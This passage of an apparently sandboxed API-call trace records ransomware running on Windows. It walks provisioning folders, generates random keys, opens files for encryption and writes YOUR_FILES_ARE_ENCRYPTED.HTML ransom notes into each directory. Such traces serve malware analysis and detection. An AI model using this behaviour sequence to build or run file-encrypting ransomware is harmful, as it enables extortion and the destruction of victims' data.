lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" [0107.067] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.067] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.067] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d2f19c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d2f19c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0107.068] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.072] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml") returned 100 [0107.072] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.072] lstrlenW (lpString=".xml") returned 4 [0107.072] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.072] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.072] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.073] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.073] CloseHandle (hObject=0x32c) returned 1 [0107.073] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.073] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.073] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned 85 [0107.073] GetProcessHeap () returned 0x600000 [0107.073] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.074] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov" [0107.074] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*" [0107.074] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.074] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.074] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.074] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.074] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned 93 [0107.075] GetProcessHeap () returned 0x600000 [0107.075] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0107.075] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime" [0107.075] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*" [0107.075] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.075] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.075] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.075] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.075] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.075] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.075] lstrlenW (lpString=".provxml") returned 8 [0107.075] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.075] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0ce2cc2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0ce2cc2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d08f31, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0 [0107.075] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.075] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.075] GetProcessHeap () returned 0x600000 [0107.076] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.076] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.076] WriteFile (in: hFile=0x31c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.077] CloseHandle (hObject=0x31c) returned 1 [0107.078] GetProcessHeap () returned 0x600000 [0107.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.078] GetProcessHeap () returned 0x600000 [0107.078] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0107.079] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d08f31, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d08f31, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.079] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.079] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml") returned 97 [0107.079] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.079] lstrlenW (lpString=".xml") returned 4 [0107.079] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.079] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.079] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.080] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=348) returned 1 [0107.080] CloseHandle (hObject=0x31c) returned 1 [0107.080] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d08f31, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d08f31, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0d2f19c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x15c, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.080] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.080] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.080] GetProcessHeap () returned 0x600000 [0107.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.081] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0107.081] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.082] CloseHandle (hObject=0x32c) returned 1 [0107.083] GetProcessHeap () returned 0x600000 [0107.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.083] GetProcessHeap () returned 0x600000 [0107.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.084] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.084] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0107.084] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.084] GetProcessHeap () returned 0x600000 [0107.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.084] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.085] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.095] CloseHandle (hObject=0x308) returned 1 [0107.096] GetProcessHeap () returned 0x600000 [0107.096] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.097] GetProcessHeap () returned 0x600000 [0107.097] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.098] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{c5dc3753-b6c8-4057-b396-bf13d769311c}", cAlternateFileName="{C5DC3~1")) returned 1 [0107.098] StrStrIW (lpFirst="{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.098] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned 80 [0107.098] GetProcessHeap () returned 0x600000 [0107.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.099] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}" [0107.099] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*" [0107.099] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.101] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcd9e222, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcd9e222, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcd9e222, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.101] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebc2ab1, ftCreationTime.dwHighDateTime=0x1d112b1, ftLastAccessTime.dwLowDateTime=0xebc2ab1, ftLastAccessTime.dwHighDateTime=0x1d112b1, ftLastWriteTime.dwLowDateTime=0xebc2ab1, ftLastWriteTime.dwHighDateTime=0x1d112b1, nFileSizeHigh=0x0, nFileSizeLow=0x666, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.102] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.102] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml") returned 99 [0107.102] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.102] lstrlenW (lpString=".xml") returned 4 [0107.102] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.102] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.102] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.102] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1638) returned 1 [0107.102] GetProcessHeap () returned 0x600000 [0107.102] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.105] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="1A") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="2F") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="FE") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="F3") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="83") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="CF") returned 2 [0107.105] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="6C") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="4F") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="A8") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="2B") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="E7") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="FF") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="82") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="29") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="EB") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="81") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="28") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1C") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="AD") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="D0") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E9") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="87") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="86") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="68") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="83") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="6F") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="88") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="42") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="30") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="2F") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="47") returned 2 [0107.105] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0F") returned 2 [0107.106] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c5dc3753-b6c8-4057-b396-bf13d769311c}\\customizations.xml" | out: 